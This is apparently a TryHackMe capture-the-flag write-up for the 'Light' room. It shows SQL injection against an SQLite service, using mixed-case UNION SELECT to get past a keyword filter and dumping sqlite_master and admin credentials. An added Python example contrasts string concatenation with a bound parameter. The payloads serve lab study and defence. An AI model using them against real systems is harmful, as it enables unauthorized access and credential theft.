# Light

{% embed url="<https://tryhackme.com/r/room/lightroom>" %}

The following post by 0xb0b is licensed under [CC BY 4.0](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

For this challenge, we will skip the Nmap scan. The room description already asks us to connect to port `1337`. We also get a user to start with. The service on `1337` could be the aforementioned database application called Light.

<figure><img src="/files/GW7YLGOEGgfFn3VSpWHl" alt=""><figcaption></figcaption></figure>

Since this is a database challenge, we try the simplest SQL injection payload, `'`, and get an error back. The service might be vulnerable to SQL injection. The error message tells us about an unrecognized token in `''' LIMIT 30"`. Our `'` has probably broken out of the enclosing string, which led to this error.

<figure><img src="/files/4lu6EkuRImASYQX0BpuD" alt=""><figcaption></figcaption></figure>

Now, let's try to get more information using a UNION SELECT injection. But it errors because of the comment we used.

```
' UNION SELECT 1 -- -
```

<figure><img src="/files/6RyeyMtVP70PTcJIeEGS" alt=""><figcaption></figcaption></figure>

Alternatively, we use `#` as the comment and no longer receive the same error as before. But some words get blocked, possibly UNION and SELECT.

```
' UNION SELECT 1 #
```

<figure><img src="/files/XNwz3bKrPbJ7ew5yO51C" alt=""><figcaption></figcaption></figure>

We mix upper-case and lower-case characters in UNION, but still get an error. The SELECT keyword might be blocked too.

```
' UniOn SELECT 1 #
```

<figure><img src="/files/5oA73NHFD3bf8woriNdf" alt=""><figcaption></figcaption></figure>

After applying the same technique to the SELECT statement, we now get a different error. The token `#` is not recognized.

```
' UniOn SeLeCt 1 #
```

<figure><img src="/files/GRrPo7JPGmyf8H1MEpGa" alt=""><figcaption></figcaption></figure>

We URL-encode the `#` character, but that does not help either. Instead, we receive another error regarding the `'` character.

```
' UniOn SeLeCt 1 %23
```

<figure><img src="/files/TXX6z5jvdrxMuPNxJJTP" alt=""><figcaption></figcaption></figure>

So maybe there is a statement like this, which breaks when a `'` is inserted:

```
SELECT * FROM users WHERE username = '{user_input}' LIMIT 30; 
```

Leading to:

```
SELECT * FROM users WHERE username = ''' LIMIT 30;
```

We close our statement with another `'`, which pairs with the statement's own closing quote so that no comment is needed, and now have a successful UNION-based injection.

```
' UniOn SeLeCt 1 '
```

<figure><img src="/files/Q7LKEZG6MIRrnKbYZgKg" alt=""><figcaption></figcaption></figure>
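The root cause and its fix, as an added example that is not part of the original post and not the room's code: it rebuilds the statement guessed above against an in-memory SQLite database, once with string concatenation behind a case-sensitive keyword blocklist and once with a bound parameter. The `users` table contents, the `BLOCKED` list and the function names are constructed assumptions.

```python
import sqlite3

# Hypothetical case-sensitive blocklist; the page does not show the real filter.
BLOCKED = ("UNION", "SELECT", "--")

def make_db():
    """In-memory database holding one constructed user row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'constructed-password')")
    return db

def lookup_concat(db, user_input):
    """'Before' form: blocklist check, then string concatenation (stays injectable)."""
    if any(word in user_input for word in BLOCKED):
        return "blocked"
    query = f"SELECT password FROM users WHERE username = '{user_input}' LIMIT 30"
    try:
        return db.execute(query).fetchall()
    except sqlite3.Error as exc:
        return f"Error: {exc}"

def lookup_bound(db, user_input):
    """Hardened form: the input is bound as a value and never parsed as SQL."""
    query = "SELECT password FROM users WHERE username = ? LIMIT 30"
    return db.execute(query, (user_input,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Inputs taken from the walk-through above, plus one legitimate username.
    for value in ["alice", "'", "' UNION SELECT 1 '", "' UniOn SeLeCt 1 '"]:
        print(repr(value))
        print("   concat:", lookup_concat(db, value))
        print("   bound: ", lookup_bound(db, value))
```

With the bound parameter, every input from the walk-through is compared as a literal username and returns no rows, so the blocklist is no longer carrying any of the security.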

Next, we query for the version to determine which DBMS is in use, so that we can craft the payloads to retrieve the data from the database. It is an SQLite database, version 3.31.1.

```
' UniOn SeLeCt @@version '
' UniOn SeLeCt version() '
' UniOn SeLeCt sqlite_version() '
```

<figure><img src="/files/4gPbbKOAZgOGqZHmmnHD" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md>" %}

Next, we query `sqlite_master` to get the database structure. There is an `admintable` and a `usertable`.

```
' UniOn SeLeCt group_concat(sql) FROM sqlite_master '
```

<figure><img src="/files/wut1g6qrLMGoc6Jq2kM3" alt=""><figcaption></figcaption></figure>

We query username and password from the `usertable`, but do not find the information asked for:

```
' UniOn SeLeCt group_concat(username) FROM usertable '
```

```
' UniOn SeLeCt group_concat(password) FROM usertable '
```

<figure><img src="/files/CBDIyA9TKyx6cMxN1lSM" alt=""><figcaption></figcaption></figure>

Next, we query for the username and password from the `admintable` and find the username, the password and the flag asked for.

```
' UniOn SeLeCt group_concat(username) FROM admintable '
```

```
' UniOn SeLeCt group_concat(password) FROM admintable '
```

<figure><img src="/files/LJE670YJZGZWvhqG6hrl" alt=""><figcaption></figcaption></figure>

